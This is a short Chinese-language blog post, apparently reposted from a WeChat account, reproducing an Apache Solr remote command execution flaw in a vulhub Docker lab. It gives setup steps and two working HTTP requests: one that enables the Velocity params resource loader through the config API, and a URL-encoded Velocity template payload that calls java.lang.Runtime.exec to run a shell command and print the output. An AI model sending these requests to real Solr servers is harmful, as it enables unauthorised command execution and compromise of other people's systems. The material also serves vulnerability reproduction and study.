蹭个热度,复现一波:Apache Solr远程命令执行漏洞。
环境可以使用/vulhub/solr/CVE-2019-0193/的环境,进入目录后直接 docker-compose up -d 如下:
接着访问对应地址可以看到,搭建好的镜像是没有集合的,所以我们需要自行创建一个集合:
通过 docker exec -it 容器ID /bin/bash 进入容器后执行:./solr create -c solr_sample 创建集合如下:
可以从重新浏览器访问一下solr admin,查看集合是否创建成功:
确认成功后即可先通过bp向对应路径发送请求修改params.resource.loader.enabled配置为true,请求如下:
修改完配置以后通过poc即可执行任意命令如图:
相关poc如下:
//修改配置poc
POST /solr/集合名/config HTTP/1.1
Host: 192.168.119.134:8983
Content-Length: 259
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
//远程代码执行poc
GET /solr/solr_sample/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ls%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: localhost:8983
Host: 192.168.119.134:8983
Content-Length: 0
原文始发于微信公众号(糖果的实验室):Apache Solr远程命令执行复现
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论